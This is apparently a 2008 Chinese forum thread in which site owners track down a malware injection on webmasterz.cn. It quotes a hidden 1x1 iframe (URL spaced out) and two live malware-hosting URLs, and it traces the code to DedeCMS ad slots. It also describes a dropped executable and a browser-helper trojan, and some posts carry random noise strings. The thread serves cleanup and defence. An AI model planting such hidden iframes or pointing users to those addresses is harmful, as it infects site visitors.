webmasterz.cn上的掛馬掛在哪了我怎麼查了半天查不到？

顯示全部樓層 · 發表於 2008-1-10 16:50:35

請老大仔細的查查吧，剛又發現了幾個，全是免殺的~~一個勁的往外蹦，但是我的卡卡即不報~~
http://ppp.749571.com/dm/test.htm
http://www.985676.cn/encrypt/mm.htm
這兩個是免殺的，還有幾個沒記下來，
這掛馬的兔崽子有一手，隱藏的很好啊~~一般人都看不出來~

顯示全部樓層 · 發表於 2008-1-10 17:01:37

會在C盤下產生 CRESS1.EXE
然後增加IE的BHO的木馬還釋放驅動

顯示全部樓層 · 發表於 2008-1-10 17:34:02

昏他藏得好隱秘找到了放毒得地方了

iframe src=h t t p://w w w.9856 76.cn/encrypt/mm.htm width=1 height=1></iframe>
然後再這個地址轉到ppp.749571.co m/dm/test.htm
為了跟蹤這個病毒自己失誤的。。。。哎。修復中ing。。。。
靜水趕快清理了吧

顯示全部樓層 · 發表於 2008-1-10 18:00:24

原帖由 20082008 於 2008-1-9 16:33 發表
1 l/ p6 ^: p u# H: i沒裝REAL就沒事，好在我重新裝的系統:

說的沒錯

顯示全部樓層 · 發表於 2008-1-11 02:27:32

原帖由 freelzyr 於 2008-1-10 16:47 發表 ; b3 H6 P5 Z# R" Y2 c0 P) I  u. h" h; a
進dede後台 6 P  g# |6 D+ j8 M0 L/ e8 g& g
檢查 ad_js.php?aid=1
( |) P+ F0 v) q$ T% b( q. O( ^ad_js.php?aid=2
% b* S+ L, @% t' N. S3 W* N9 Had_js.php?aid=3 - k0 L/ |% e4 |' u& L
ad_js.php?aid=4
$ c1 z/ M$ X. a' q* Q2 x2 Q3 c1 h5 }$ R: m8 o8 l
這幾個廣告裡面的代碼
% N0 k& F3 m9 V  W( V3 Y" |& S4 X在這幾個掉茅廁位裡面含有木馬的代碼

這個檢查了沒有的

顯示全部樓層 · 發表於 2008-1-11 09:09:11

原帖由 靜水流深 於 2008-1-11 02:27 發表
! K1 t" U2 Z: J" ^: m9 z7 H0 M H! e' D3 H" t$ m" B" L6 R

' x! m i% c9 U/ F7 A7 ^這個檢查了沒有的

我看過了，有掛馬的代碼，代碼已經在你的另一個貼子裡貼出來了

顯示全部樓層 · 發表於 2008-1-11 12:44:57

原帖由 靜水流深 於 2008-1-11 02:27 發表
2 a& E0 H7 k4 i/ c$ V1 P+ P# H) B- e: O* H/ D8 g
) s) A# q6 W1 L$ k
這個檢查了沒有的

木馬就是在這裡裡啊
在後台的掉茅廁位設置那
裡

顯示全部樓層 · 發表於 2008-1-30 10:38:22

現在明瞭.
有人收流量做ppp.749571.co m的..
最近被掛馬的話. 都改成js了. 不用iframe了

顯示全部樓層 · 發表於 2008-1-30 11:53:15

菜鳥,怕怕,不敢看,啥時好了說一聲,我再去看風景

		自動登錄	找回密碼
密碼			免费注册

webmasterz.cn上的掛馬掛在哪了 我怎麼查了半天查不到？

webmasterz.cn上的掛馬掛在哪了我怎麼查了半天查不到？